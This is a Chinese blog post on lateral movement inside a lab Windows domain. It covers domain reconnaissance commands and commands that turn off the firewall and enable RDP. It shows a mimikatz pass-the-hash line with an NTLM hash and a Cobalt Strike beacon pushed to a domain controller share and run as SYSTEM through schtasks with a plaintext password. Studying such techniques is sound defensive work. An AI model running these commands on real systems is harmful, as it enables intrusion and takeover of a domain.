内网渗透-3

最新推荐文章于 2024-10-18 20:00:23 发布
最新推荐文章于 2024-10-18 20:00:23 发布
阅读量179 收藏 1
点赞数 2
分类专栏: 内网渗透 文章标签: django
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48776804/article/details/117439309
版权

横向移动的方法

  • win7 web服务器 192.168.3.125(外)192.168.52.143
  • 域成员 192.168.52.141(内)
  • 域控 192.168.52.138(内)
    在这里插入图片描述

1 pth横向移动

通过cs上线的win7-web服务器,利用ntml哈希,获取域控的权限,并上线cs马
(1)域内信息收集
其中win作为web服务器,配置双网卡,使用桥接无线的方式连接外网,但有一个问题,双网卡会影响寻找域控,需要在dns解析文件里增加一行。
在这里插入图片描述
文件位置:C:\Windows\System32\drivers\etc
在这里插入图片描述
搜集主机信息

whoami
hostname
whoami /all
systeminfo

判断域的存在
net view /domain
net user /domain
net time /domain
nslookup god.org
net config workstation

操作系统信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"   
echo %PROCESSOR_ARCHITECTURE%

安装的软件和版本、路径信息

wmic product get name,version   # 使用wmic操作
powershell "Get-WmiObject -class Win32_Product | Select-Object -Property name,Version"   #使用powershell进行操作

查询信息命令

wmic service list brief   # 查询本机服务信息
tasklist                   #查询进程
wmic process list brief   #使用wmic查询进程
wmic  startup get command,caption   #查看启动进程
schtasks /query /fo list /v      # 查看计划任务
net statistics workstation     # 查看主机开机时间
netstat -ano    #查询端口列表
wmic qfe get caption,description,hotfixid,installedon   #查询本机安装的补丁

查询机器内账户信息

net user    #查看本机用户列表
net localgroup administrators  # 获取本地管理员
query user || qwinsta   # 获取在线用户
net session    # 列出计算机所连接的客户端之间的会话
net share   # 查看本机共享列表
wmic share get name,path,status #使用wmic 查询本机共享列表

关闭防火墙

netsh firewall set opmode disable   # windows server 2003 之前
netsh advfirewall set allprofiles state off  # windows server 2003 之后

开启3389端口
注册表打开:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f   #开启的话把0改为1

wmic开启3389:

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

查找域内信息

net view /domain:god # 查看域内所有计算机
net group /domain  #查看域内所有用户列表
net group "domain computers" /domain #查看域成员计算机列表

Domain Admins :域管理员
Domain Computers:域内机器
Domain Controllers:域控制器
Domain Guests:域访客
Domain Users:域用户
Enterprise Admins:企业系统管理员

nltest /domain_trusts #获取域信任信息
sltest /DCLIST:god #查看域控制器机器名
net group "domain admins" /domain #查询域管理员用户
net group "Enterprise admins" /domain # 查询管理员用户

(2)哈希传递

  • 建立监听
    在这里插入图片描述
    如果用外网起的listen,域控不出网,无法上线
    在这里插入图片描述

  • 查看目录并上传cs马
    logonpasswords或者
    在这里插入图片描述

在这里插入图片描述

哈希传递
mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:54c6a15e8136e220426b4f378539d600
54c6a15e8136e220426b4f378539d600
dir \\192.168.52.138\c$

在这里插入图片描述
疑问,这个是c盘,还是system32目录

在这里插入图片描述

生成新的域控马,放在win7桌面shell文件夹下,名为yukong,exe,使用shell命令行从控制机到域控上传

在这里插入图片描述

共享传马
shell copy C:\Users\Administrator\Desktop\shell\yukong.exe \\192.168.52.138\c$
shell schtasks /create /tn "test" /tr C:\yukong.exe /sc once /st 18:26 /S 192.168.52.138 /RU System  /u administrator /p "hongrisec@2019"
shell schtasks /delete /s 192.168.52.138 /tn "test" /f

在这里插入图片描述
启动计划任务

拿到shell
在这里插入图片描述

在这里插入图片描述

2 甜点

  • win7的shell文件夹
    在这里插入图片描述

  • 域控的c盘根目录

在这里插入图片描述

  • cs监听器
    在这里插入图片描述
wx_7782175678
关注
专栏目录
内网渗透-Linux内网渗透
lza20001103的博客
08-16 1726
内网渗透-Linux内网渗透
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1942
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
内网渗透-src挖掘-外网打点到内网渗透-3层内网渗透测试记录-2023年1月
qq1140037586的博客
01-06 1403
内网渗透-src挖掘-外网打点到内网渗透-3层内网渗透测试记录-2023年1月
内网渗透-完整的域渗透
热门推荐
Love&Share
11-28 1万+
文章目录域环境概念创建域创建组&用户加入域域渗透常规信息收集内网信息收集拿下20031.MySQL弱口令2.哈希传递攻击拿下域控信息收集mimikatz后渗透&其他MSF其他模块推荐阅读: 域环境 在开始域渗透之前,先来简单了解下域的一些概念 概念 域 域(Domain)是一个有安全边界的计算机集合(安全边界的意思是,在两个域中,一个域中的用户无法访问另一个域中的资源) 工作组的分散管理模式不适合大型的网络环境下工作,域模式就是针对大型的网络管理需求设计的,就是共享用户账号,计算机账号和.
内网渗透-域渗透
qq_44806973的博客
11-23 5352
内网渗透(域渗透) 基础指南
内网渗透--总结
weixin_52374319的博客
05-08 9314
内网渗透–总结 前言 记录一个月来对内网渗透的学习总结,内网渗透提前是我们已经通过各种手段拿到内网中某一台可以通向外网的服务器或主机的权限,然后把此当作跳板,内网渗透的目的是拿到DC域控制器的权限,达到控制整个域环境。 信息收集 内网渗透测试,其本质就是信息收集。信息收集的深度,直接关系到内网渗透测试的成败。当你拿下内网的一台主机后,面对的是一片未知的区域,所以首先要做的就是对当前所处的网络环境进行判断。包括以下几点: 对当前机器角色的判断 对当前机器所处的网络环境进行判断 对当前机器所处的网络区域进
内网渗透-SSRF漏洞
小刚的博客
08-19 1289
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 SSRF漏洞SSRF产生原因利用方式小案例1.请求内网资源2.端口扫描3.读取源文件4.Gopher://协议进行扩展攻击5.漏洞组合利用挖掘技巧1.传参方面2.web服务方面3.审计方面防御措施 SSRF SSRF服务器端请求伪造, 全英文Service_side Request Forgery 一般人也记不住 主要利用漏洞来伪造成服务器端发起请求,比如绕过防火墙,进行内网探测,能够突破客户端获.
内网渗透-使用anydesk进行远控
Z4400840的博客
05-10 1023
在进行内网渗透的时候,如果目标机器出网,但是有时候目标3389端口未开放也就表示我们无法使用远程桌面进行连接。但是依然有很多第三方远程控制软件可以帮助我们,例如Teamviewer或者AnyDesk。本片文章我们将使用Cobalt Strike配合AnyDesk进行演示。
内网渗透--vulntarget-a
m0_66299232的博客
04-04 1069
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
内网渗透-详解代理逻辑及隧道
2401_84466225的博客
05-26 1253
红蓝对抗过程中打点以后往往需要进行内网渗透和横向移动,因此大家都需要扎实掌握代理和隧道知识,一款优秀的代理工具也可以给内网渗透带来很大的收益。本期分享,小星将通过简单易懂的方式向大家普及各种代理逻辑及隧道的原理和操作过程。1代理客户端,帮助客户端完成所需请求。举例:小星要向银行贷款,可是因为自己资历不够,所以不获银行放贷,小星个人无法贷到所需款项。此时,只要小星找一个满足资历的A先生去帮忙借贷,银行自然就会放贷。贷款到账后,A先生再私下把钱给到小星。
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
ISC-内网渗透 -最终版.pdf
04-08
通过对Active Directory渗透的基础知识、认证方式、远程命令执行技术及内网渗透流程的详细介绍,我们可以了解到,在实施内网渗透时,掌握这些核心技术点对于成功渗透目标网络至关重要。此外,合理运用各种技术和工具...
Redis Search系列 - 第一讲 创建索引
罗小爬的技术宝书
10-18 594
Redis Search 是 Redis 的一个模块,用于提供全文搜索和二级索引功能。:停用词是指在索引和搜索过程中被忽略的常见词,如 “the”、“is”、“and” 等。:术语是索引中的一个条目,表示一个唯一的词元。:索引是一个数据结构,用于快速查找包含特定词的文档。它通常是一个倒排索引(inverted index),其中存储了每个词及其在文档中的位置。:文档是索引中的基本单位。创建索引后,Redis Stack会自动索引存储在数据库中的任何现有的、修改的或新创建的JSON文档。
从零开始:使用 Flask 或 Django 构建 RESTful API
qq_44771627的博客
10-16 1380
在当今这个数据驱动的时代,构建高效、可扩展的后端服务变得尤为重要。RESTful API 作为一种设计模式,已经成为现代 Web 开发的标准之一。无论是小型初创公司还是大型企业,都需要一个强大的后端来支持前端应用的快速迭代和用户需求的变化。Flask 和 Django 是 Python 生态中最受欢迎的两个 Web 框架,它们都可以用来构建 RESTful API。本文将详细介绍如何使用这两个框架来构建 RESTful API,并通过实例帮助你理解其核心概念和实际应用。
【记录】Django数据库的基础操作
丑小鸭
10-15 376
注意书写过程中需要保证缩进,不要在某一行后加 逗号等标点符号#创建数据库中的表#数据库需要先创建好 因为 mysqlclient 这个包只能创建表 不能创建数据库#表名:ai_imgdetail#图片的id#上传时间#校验时间#经度#纬度#海拔。
013_django基于大数据的高血压人群分析系统2024_dcb7986h_055
最新发布
2301_76419561的博客
10-18 752
博主介绍:CodeMentor毕业设计领航者、全网关注者30W+群落,InfoQ特邀专栏作家、技术博客领航者、InfoQ新星培育计划导师、Web开发领域杰出贡献者,博客领航之星、开发者头条/腾讯云/AWS/Wired等平台优选内容创作者、深耕Web开发与学生毕业设计实战指导,与高校教育者/资深讲师/行业专家深度对话🤝。
10 django管理系统 - 管理员管理 - 新建管理员(通过模态框和ajax实现)
小心菜鸟出没
10-18 733
在文章“04 django管理系统 - 部门管理 - 新增部门”中,我们通过传统的新增页面来实现部门的添加。在本文中,我们通过模态框和ajax来实现管理员的新增。
Django-应用及分布式路由
weixin_67852201的博客
10-15 221
可以在app下的templates目录下再创建一个同名目录,然后将html文件放到该目录下。文件同名导致查询的html错误。
基于Python Django的在线考试管理系统
卫星:biyesheji88的博客
10-12 1122
亲爱的同学们,如果你对在线考试管理系统感兴趣,或者对Python Django开发有独到的见解,欢迎在评论区留下你的想法,我们一起交流学习。你的每一个互动都是我前进的动力,让我们一起探讨技术的魅力,共同进步!期待在评论区看到你的精彩发言,让我们共同成长,共创未来!👇🏻 精彩专栏推荐订阅 👇🏻 不然下次找不到哟~Java实战项目Python实战项目微信小程序|安卓实战项目大数据实战项目PHP|C#.NET|Golang实战项目🍅 主页获取源码联系🍅。
内网渗透--DNS隧道
05-16
DNS隧道是一种基于DNS协议的网络隧道,可以用于在内网环境中进行数据传输。DNS协议本身是一种无状态的协议,可以通过DNS请求和响应消息中的域名字段来...3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止DNS隧道攻击。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值